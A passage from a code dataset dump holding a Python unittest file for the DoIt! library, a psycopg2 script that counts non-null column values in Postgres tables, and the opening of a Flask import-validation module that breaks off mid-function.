"pandas.read_json", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 130, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 225, "usage_type": "call"}, {"api_name": "bayes_opt.BayesianOptimization", "line_number": 250, "usage_type": "call"}]}
+{"seq_id": "9987164383", "text": "# -*- coding: utf-8 -*-\n#! \\file ./tests/test_support/test_utils.py\n#! \\author Jiří Kučera, \n#! \\stamp 2014-04-10 20:58:24 (UTC+01:00, DST+01:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nDoIt! utilities tests.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nimport time\nimport unittest\n\nfrom ..common import RAISE_FROM_ENTER, SUPRESS, ContextManagerMock, \\\n ModuleContext\n\nfrom doit.support.errors import DoItAssertionError\n\nfrom doit.support.utils import \\\n ordinal_suffix, deep_eq, timestamp, \\\n Functor, WithStatementExceptionHandler, Collection\n\nclass Struct(object):\n __slots__ = [ '__kwargs' ]\n\n def __init__(self, **kwargs):\n cls = object.__getattribute__(self, '__class__')\n clsname = cls.__name__\n _ = lambda x: x.startswith('__') and '_%s%s' % (clsname, x) or x\n setattr(self, _('__kwargs'), kwargs)\n #-def\n\n def __getattr__(self, value):\n cls = object.__getattribute__(self, '__class__')\n clsname = cls.__name__\n _ = lambda x: x.startswith('__') and '_%s%s' % (clsname, x) or x\n kwargs = object.__getattribute__(self, _('__kwargs'))\n if value in kwargs:\n return kwargs[value]\n object.__getattribute__(self, value)\n #-def\n#-class\n\nclass TimeModuleMock(ModuleContext):\n __slots__ = [\n '__old_localtime',\n '__old_timezone'\n ]\n\n def __init__(self, env):\n ModuleContext.__init__(self, env)\n self.__old_localtime = time.localtime\n self.__old_timezone = time.timezone\n #-def\n\n def replace(self, env):\n def _localtime():\n return Struct(\n tm_year = env['year'],\n tm_mon = env['month'],\n tm_mday = env['day'],\n tm_hour = env['hour'],\n tm_min = env['min'],\n tm_sec = env['sec'],\n tm_isdst = env['isdst']\n )\n self.__old_localtime = time.localtime\n self.__old_timezone = time.timezone\n time.localtime = _localtime\n time.timezone = env['tz']\n #-def\n\n def restore(self):\n time.localtime = self.__old_localtime\n time.timezone = self.__old_timezone\n #-def\n#-class\n\nclass FunctorA(Functor):\n __slots__ = []\n\n def __init__(self, a, b, c = 3):\n Functor.__init__(self, a, b, c = c)\n #-def\n#-class\n\nclass FunctorB(Functor):\n __slots__ = []\n\n def __init__(self, a, b, c = 3):\n Functor.__init__(self, a, b, c = c)\n #-def\n#-class\n\nclass TestOrdinalSuffixCase(unittest.TestCase):\n\n def test_ordinal_suffix(self):\n cases = [\n (0, 'th'),\n (1, 'st'),\n (2, 'nd'),\n (3, 'rd'),\n (4, 'th'),\n (5, 'th'),\n (10, 'th'),\n (11, 'th'),\n (12, 'th'),\n (13, 'th'),\n (14, 'th'),\n (15, 'th'),\n (20, 'th'),\n (21, 'st'),\n (22, 'nd'),\n (23, 'rd'),\n (24, 'th'),\n (25, 'th'),\n (30, 'th'),\n (31, 'st'),\n (32, 'nd'),\n (33, 'rd'),\n (34, 'th'),\n (35, 'th'),\n (50, 'th'),\n (51, 'st'),\n (52, 'nd'),\n (53, 'rd'),\n (54, 'th'),\n (55, 'th'),\n (90, 'th'),\n (91, 'st'),\n (92, 'nd'),\n (93, 'rd'),\n (94, 'th'),\n (95, 'th')\n ]\n bases = [0, 100, 1000, 10000, 1000000]\n\n for b in bases:\n for c in cases:\n self.assertEqual(ordinal_suffix(b + c[0]), c[1])\n self.assertEqual(ordinal_suffix(-(b + c[0])), c[1])\n #-def\n#-class\n\nclass TestDeepEqCase(unittest.TestCase):\n\n def test_deep_eq(self):\n x1 = lambda x: x\n\n self.assertTrue(x1, x1)\n\n self.assertTrue(deep_eq([], []))\n self.assertTrue(deep_eq([], ()))\n self.assertTrue(deep_eq((), []))\n self.assertTrue(deep_eq((), ()))\n\n self.assertFalse(deep_eq({}, ()))\n self.assertFalse(deep_eq([], {}))\n self.assertTrue(deep_eq({}, {}))\n\n self.assertTrue(deep_eq([[]], [()]))\n self.assertFalse(deep_eq([], [()]))\n\n self.assertTrue(deep_eq([[1, 2], [3]], [(1, 2), (3,)]))\n self.assertTrue(deep_eq([[1, 2], [3, (4, 5)]], [(1, 2), (3, [4, 5])]))\n self.assertFalse(deep_eq(\n [[1, 2], [3, (4, 5)]],\n [(1, 2), (3, [4, [5]])]\n ))\n\n self.assertTrue(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 1}))\n self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 0}))\n self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'x': 1}))\n self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 1, 1: 1}))\n self.assertTrue(deep_eq(\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]},\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]}\n ))\n self.assertFalse(deep_eq(\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]},\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3, 4)})}]}\n ))\n\n self.assertTrue(deep_eq(1, 1))\n self.assertFalse(deep_eq(1, 2))\n #-def\n#-class\n\nclass TestTimeStampCase(unittest.TestCase):\n\n def test_dst(self):\n env = dict(\n year = 2008, month = 7, day = 11,\n hour = 13, min = 15, sec = 34,\n isdst = 1, tz = -5378\n )\n with TimeModuleMock(env):\n t = timestamp()\n self.assertEqual(t['year'], 2008)\n self.assertEqual(t['month'], 7)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '+')\n self.assertEqual(t['utchour'], 1)\n self.assertEqual(t['utcmin'], 29)\n self.assertEqual(t['utcsec'], 38)\n self.assertEqual(t['dsthour'], 1)\n self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n\n def test_nodst(self):\n env = dict(\n year = 2008, month = 11, day = 11,\n hour = 13, min = 15, sec = 34,\n isdst = 0, tz = 5378\n )\n with TimeModuleMock(env):\n t = timestamp()\n self.assertEqual(t['year'], 2008)\n self.assertEqual(t['month'], 11)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '-')\n self.assertEqual(t['utchour'], 1)\n self.assertEqual(t['utcmin'], 29)\n self.assertEqual(t['utcsec'], 38)\n self.assertEqual(t['dsthour'], 0)\n self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n\n def test_dst_not_avail(self):\n env = dict(\n year = 2008, month = 7, day = 11,\n hour = 13, min = 15, sec = 34,\n isdst = -1, tz = 14400\n )\n with TimeModuleMock(env):\n t = timestamp()\n self.assertEqual(t['year'], 2008)\n self.assertEqual(t['month'], 7)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '-')\n self.assertEqual(t['utchour'], 4)\n self.assertEqual(t['utcmin'], 0)\n self.assertEqual(t['utcsec'], 0)\n self.assertEqual(t['dsthour'], 0)\n self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n#-class\n\nclass TestFunctorCase(unittest.TestCase):\n\n def test_equality(self):\n f1 = FunctorA(1, 2, c = 4)\n f2 = FunctorB(1, 2, c = 4)\n f3 = FunctorA(1, 2, 4)\n\n self.assertNotEqual(f1, f2)\n self.assertEqual(f1, f3)\n #-def\n#-class\n\nclass TestWithStatementExceptionHandlerCase(unittest.TestCase):\n\n def test_what_happen_when_exception_is_not_raised(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(0)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_from_enter(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(RAISE_FROM_ENTER)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNotNone(wseh.etype)\n self.assertIsNotNone(wseh.evalue)\n self.assertIsNotNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_within_block(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(0)\n\n with wseh, ctxmock:\n raise Exception()\n\n self.assertIsNotNone(wseh.etype)\n self.assertIsNotNone(wseh.evalue)\n self.assertIsNotNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_not_raised_and_supressed(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(SUPRESS)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_and_supressed(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(SUPRESS)\n\n with wseh, ctxmock:\n raise Exception()\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n#-class\n\nclass TestCollectionCase(unittest.TestCase):\n\n def test_create_unique_objects(self):\n a = Collection('MyColl1')\n\n self.assertEqual(a.name, 'MyColl1')\n self.assertEqual(a.qname, 'MyColl1')\n\n b = Collection('MyColl1')\n\n self.assertEqual(b.name, 'MyColl1')\n self.assertEqual(b.qname, 'MyColl1')\n\n c = Collection('MyColl2')\n\n self.assertEqual(c.name, 'MyColl2')\n self.assertEqual(c.qname, 'MyColl2')\n\n d = Collection()\n e = Collection()\n\n self.assertIs(a, b)\n self.assertEqual(a.name, b.name)\n self.assertEqual(a.qname, b.qname)\n self.assertIsNot(a, c)\n self.assertNotEqual(a.name, c.name)\n self.assertNotEqual(a.qname, c.qname)\n self.assertIsNot(d, e)\n self.assertNotEqual(d.name, e.name)\n self.assertNotEqual(d.qname, e.qname)\n #-def\n\n def test_create_subobjects(self):\n Fruit = Collection('Fruit')\n\n self.assertEqual(Fruit.name, 'Fruit')\n self.assertEqual(Fruit.qname, 'Fruit')\n\n Apple = Fruit.Apple\n\n self.assertEqual(Apple.name, 'Apple')\n self.assertEqual(Apple.qname, 'Fruit.Apple')\n\n Orange = Fruit.Orange\n\n self.assertEqual(Orange.name, 'Orange')\n self.assertEqual(Orange.qname, 'Fruit.Orange')\n\n Banana = Fruit.Banana\n\n self.assertEqual(Banana.name, 'Banana')\n self.assertEqual(Banana.qname, 'Fruit.Banana')\n\n Vegetable = Collection('Vegetable')\n\n self.assertEqual(Vegetable.name, 'Vegetable')\n self.assertEqual(Vegetable.qname, 'Vegetable')\n\n Carrot = Vegetable.Carrot\n\n self.assertEqual(Carrot.name, 'Carrot')\n self.assertEqual(Carrot.qname, 'Vegetable.Carrot')\n\n Potato = Vegetable.Potato\n\n self.assertEqual(Potato.name, 'Potato')\n self.assertEqual(Potato.qname, 'Vegetable.Potato')\n\n Tomato = Vegetable.Tomato\n\n self.assertEqual(Tomato.name, 'Tomato')\n self.assertEqual(Tomato.qname, 'Vegetable.Tomato')\n\n Dairy = Collection('Dairy')\n\n self.assertEqual(Dairy.name, 'Dairy')\n self.assertEqual(Dairy.qname, 'Dairy')\n\n Cheese = Dairy.Cheese\n\n self.assertEqual(Cheese.name, 'Cheese')\n self.assertEqual(Cheese.qname, 'Dairy.Cheese')\n\n Chedar = Cheese.Chedar\n\n self.assertEqual(Chedar.name, 'Chedar')\n self.assertEqual(Chedar.qname, 'Dairy.Cheese.Chedar')\n\n ProceededChedar = Chedar.Proceeded\n\n self.assertEqual(ProceededChedar.name, 'Proceeded')\n self.assertEqual(\n ProceededChedar.qname, 'Dairy.Cheese.Chedar.Proceeded'\n )\n\n Ementaler = Cheese.Ementaler\n\n self.assertEqual(Ementaler.name, 'Ementaler')\n self.assertEqual(Ementaler.qname, 'Dairy.Cheese.Ementaler')\n\n Food = Collection(\n 'Food', 'Fruit', 'Vegetable', 'Dairy.Cheese.Chedar', 'Dairy.Cheese'\n )\n\n self.assertEqual(Food.name, 'Food')\n self.assertEqual(Food.qname, 'Food')\n self.assertIs(Apple, Food.Apple)\n self.assertIs(Orange, Food.Orange)\n self.assertIs(Banana, Food.Banana)\n self.assertIs(Carrot, Food.Carrot)\n self.assertIs(Potato, Food.Potato)\n self.assertIs(Tomato, Food.Tomato)\n self.assertIs(Chedar, Food.Chedar)\n self.assertIs(ProceededChedar, Food.Proceeded)\n self.assertIs(Food.Chedar.Proceeded, Food.Proceeded)\n self.assertIs(Ementaler, Food.Ementaler)\n #-def\n\n def test_contains_operator(self):\n A = Collection(\"A\")\n B = Collection(\"@\")\n\n self.assertNotIn(A, B)\n self.assertNotIn(B, A)\n self.assertIn(A, A)\n self.assertIn(B, B)\n self.assertIn(A.B, A)\n self.assertNotIn(A.B, A.C)\n self.assertIn(B.C.D.S, B.C)\n self.assertNotIn(B, B.A)\n self.assertNotIn(A.BCEF.G, A.BCE)\n self.assertIn(A.BCE.G, A.BCE)\n #-def\n\n def test_lock(self):\n with self.assertRaises(DoItAssertionError):\n Collection.lock()\n T = Collection(\"T\")\n with self.assertRaises(DoItAssertionError):\n Collection.unlock()\n T = Collection(\"T\")\n Collection.lock()\n t = T.Test\n #-def\n\n def test_unlock(self):\n Collection.lock()\n Collection.unlock()\n Test = Collection(\"Test\")\n t = Test.Test1\n #-def\n\n def tearDown(self):\n Collection.unlock()\n #-def\n#-class\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestOrdinalSuffixCase))\n suite.addTest(unittest.makeSuite(TestDeepEqCase))\n suite.addTest(unittest.makeSuite(TestTimeStampCase))\n suite.addTest(unittest.makeSuite(TestFunctorCase))\n suite.addTest(unittest.makeSuite(TestWithStatementExceptionHandlerCase))\n suite.addTest(unittest.makeSuite(TestCollectionCase))\n return suite\n#-def\n", "repo_name": "i386x/doit", "sub_path": "tests/test_support/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 15829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "common.ModuleContext", "line_number": 69, "usage_type": "name"}, {"api_name": "common.ModuleContext.__init__", "line_number": 76, "usage_type": "call"}, {"api_name": "common.ModuleContext", "line_number": 76, "usage_type": "name"}, {"api_name": "time.localtime", "line_number": 77, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 78, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 93, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 94, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 95, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 99, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 100, "usage_type": "attribute"}, {"api_name": "doit.support.utils.Functor", "line_number": 104, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor.__init__", "line_number": 108, "usage_type": "call"}, {"api_name": "doit.support.utils.Functor", "line_number": 108, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor", "line_number": 112, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor.__init__", "line_number": 116, "usage_type": "call"}, {"api_name": "doit.support.utils.Functor", "line_number": 116, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 120, "usage_type": "attribute"}, {"api_name": "doit.support.utils.ordinal_suffix", "line_number": 165, "usage_type": "call"}, {"api_name": "doit.support.utils.ordinal_suffix", "line_number": 166, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 170, "usage_type": "attribute"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 177, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 178, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 179, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 180, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 182, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 183, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 184, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 186, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 187, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 189, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 190, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 191, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 196, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 197, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 198, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 199, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 200, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 204, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 209, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 210, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 214, "usage_type": "attribute"}, {"api_name": "doit.support.utils.timestamp", "line_number": 223, "usage_type": "call"}, {"api_name": "doit.support.utils.timestamp", "line_number": 246, "usage_type": "call"}, {"api_name": "doit.support.utils.timestamp", "line_number": 269, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 286, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 298, "usage_type": "attribute"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 301, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 302, "usage_type": "call"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 313, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 314, "usage_type": "call"}, {"api_name": "common.RAISE_FROM_ENTER", "line_number": 314, "usage_type": "argument"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 325, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 326, "usage_type": "call"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 337, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 338, "usage_type": "call"}, {"api_name": "common.SUPRESS", "line_number": 338, "usage_type": "argument"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 349, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 350, "usage_type": "call"}, {"api_name": "common.SUPRESS", "line_number": 350, "usage_type": "argument"}, {"api_name": "unittest.TestCase", "line_number": 361, "usage_type": "attribute"}, {"api_name": "doit.support.utils.Collection", "line_number": 364, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 369, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 374, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 379, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 380, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 394, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 414, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 434, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 461, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 480, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 481, "usage_type": "call"}, {"api_name": "doit.support.errors.DoItAssertionError", "line_number": 496, "usage_type": "argument"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 497, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 497, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 498, "usage_type": "call"}, {"api_name": "doit.support.errors.DoItAssertionError", "line_number": 499, "usage_type": "argument"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 500, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 500, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 501, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 502, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 502, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 507, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 507, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 508, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 508, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 509, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 514, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 514, "usage_type": "name"}, {"api_name": "unittest.TestSuite", "line_number": 519, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 520, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 521, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 522, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 523, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 524, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 525, "usage_type": "call"}]}
+{"seq_id": "19232783049", "text": "import psycopg2\nimport logging\nimport os\nfrom time import time\nimport csv\n\n\ndef create_csv(filename):\n if os.path.isfile(filename):\n print('Result file already exist')\n else:\n print('Creating result file')\n with open(filename, 'w+') as myfile:\n wr = csv.writer(myfile, delimiter=\";\", lineterminator=\"\\n\")\n wr.writerow((\"Column\", \"Not Null\", \"Not_Null %\"))\n\n\ndef save_csv(main_data, filename):\n with open(filename, 'a') as myfile:\n try:\n wr = csv.writer(myfile, delimiter=\";\", lineterminator=\"\\n\")\n wr.writerow(main_data)\n except:\n print('Error while adding new line')\n\n\ndef queries():\n \"\"\"\n Choose your destiny\n :return: all chosen queries you want\n \"\"\"\n query_col_name1 = \"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '\"\n query_col_name2 = \"' ORDER BY ORDINAL_POSITION\"\n query_count1 = \"SELECT COUNT(*) FROM \"\n query_count2 = \" is not null\"\n select_query = \"SELECT * FROM \"\n set_schema = \"SET search_path TO rocket_data_raw\"\n set_role = \"SET role employees\"\n return query_col_name1, query_col_name2, query_count1, query_count2\n\n\ndef close_con(con_cursor, con_connection):\n con_cursor.close()\n con_connection.close()\n print(\"PostgreSQL connection is closed\")\n\n\ndef manage_connection():\n pg_user = 'urs'\n pg_password = 'urs'\n pg_host = 'urs'\n pg_port = 'urs'\n db_name = 'urs'\n schema = 'urs'\n con = psycopg2.connect(user=pg_user, password=pg_password, host=pg_host, port=pg_port, database=db_name)\n main_cursor = con.cursor()\n return con, main_cursor\n\n\ndef do_query(cursor, table, total, output):\n print(\"\\nChecking the '\" + table + \"' table ...\")\n q1, q2, q3, q4 = queries()\n column_name_query = q1 + table + q2\n cursor.execute(column_name_query)\n raw = cursor.fetchall()\n\n cols = [x[0] for x in raw]\n for c in cols:\n print(\"- Checking column '\" + c + \"' ...\")\n not_null_query = q3 + table + ' WHERE ' + c + q4\n # not null values count\n cursor.execute(not_null_query)\n nulls = cursor.fetchone()[0]\n\n # log and append result in csv\n null_percent = \"{: 10.2f}\".format(nulls / total * 100)\n save_csv([c, nulls, null_percent + '%'], output, )\n print(\"--> Not null values \" + c + \": \" + \"{:,}\".format(nulls) + '/' + \"{:,}\".format(total) + ' | ' + null_percent + ' %\\n')\n\n\ndef execute():\n try:\n # tables in 'rocket_raw' schema with total row count\n # Note - you can decide to query every table total count if you decide but i didnt. i explicitly hard coded it :)\n tables = {'Employee1': 49937443, 'Employee2': 161776046, 'Employee3': 55300300, 'Employee4': 228049317, 'Employee5': 190534019,\n 'Employee6': 146851802}\n\n connection, cursor = manage_connection()\n if connection:\n print(\"\\n ---------------------------------------- Connection opened for ------------------------------------------------------- \\n\")\n print(connection.get_dsn_parameters(), \"\\n\")\n cursor.execute(\"SELECT version();\")\n record = cursor.fetchall()\n print(\"You are connected to - \", record, \"\\n\")\n\n # Operation starts now -----------------------------------------------------------------------------------------------------------\n # *****************************************************\n # SET UR SEARCH PATH TO YOUR SCHEMA HERE\n # *****************************************************\n cursor.execute(\"SET search_path TO ************UR SCHEMA********************\")\n for table, total in tables.items():\n filename = os.getcwd() + os.sep + 'Output' + os.sep + 'File_' + table + '.csv'\n print(filename)\n create_csv(filename)\n do_query(cursor, table, total, filename)\n close_con(cursor, connection)\n\n except psycopg2.DatabaseError as db_error:\n print(\"Error while connecting to PostgreSQL \", db_error)\n pass\n\n\nstart = time()\nexecute()\nend = time()\nprint(\"TIme {}'s\".format(end - start))\n", "repo_name": "pesto93/Postgres-with-python", "sub_path": "Sql_counts.py", "file_name": "Sql_counts.py", "file_ext": "py", "file_size_in_byte": 4192, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 14, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 21, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 102, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 102, "usage_type": "attribute"}, {"api_name": "psycopg2.DatabaseError", "line_number": 108, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}, {"api_name": "time.time", "line_number": 115, "usage_type": "call"}]}
+{"seq_id": "37861589923", "text": "import datetime\nfrom db import db\nfrom components.schemas.ShopUnitImport import ShopUnitImport\nfrom components.schemas.ShopUnit import ShopUnit\nfrom components.schemas.ShopUnitType import ShopUnitType\nfrom components.schemas.ShopUnitStatistic import ShopUnitStatistic\nfrom components.schemas.ShopUnitImportRequest import ShopUnitImportRequest\nfrom flask import request\nfrom my_logs.logg import info_log, warning_log\nfrom .base_function import delete_child, response_error_400, TIME_FORMAT\nfrom flask import Blueprint\n\n\nbp_imports = Blueprint('imports', __name__)\n\n\n\n\ndef valid_request_json(data: dict, time_format: str) -> bool:\n '''\n Проверка форматы даты и основной структуры\n '''\n\n if 'items' not in data or 'updateDate' not in data or len(data) != 2:\n info_log.warning('POST:/imports Проблемы с общей структурой входных данных')\n warning_log.warning(\n f'POST:/imports Проблемы с общей структурой входных данных:\\ndata={data}\\n, 400')\n return False\n\n try:\n datetime.datetime.strptime(data['updateDate'], time_format)\n return True\n except ValueError:\n info_log.warning(f'POST:/imports Проблемы с форматом даты')\n warning_log.warning(\n f'POST:/imports Проблемы с форматом даты:\\ndata={data}\\n, 400')\n return False\n\n\ndef is_category(node_id: object) -> bool:\n if node_id is None:\n return True\n node = ShopUnit.query.filter_by(id=node_id).first()\n if node is not None:\n category = node.type\n return category == 'CATEGORY'\n return True\n\n\ndef valid_structure_item(item: dict) -> bool:\n '''\n Проверяем все ли необходимые параметры нам передали.\n '''\n if item['type'] in ['CATEGORY', 'OFFER']:\n if all(key in item for key in ['id', 'name', 'type']) and item['name'] is not None:\n return True\n info_log.warning('POST:/imports Проблемы с отдельной структурой item')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item:\\nitem={item}\\n, 400')\n return False\n\n\ndef valid_item(item: dict) 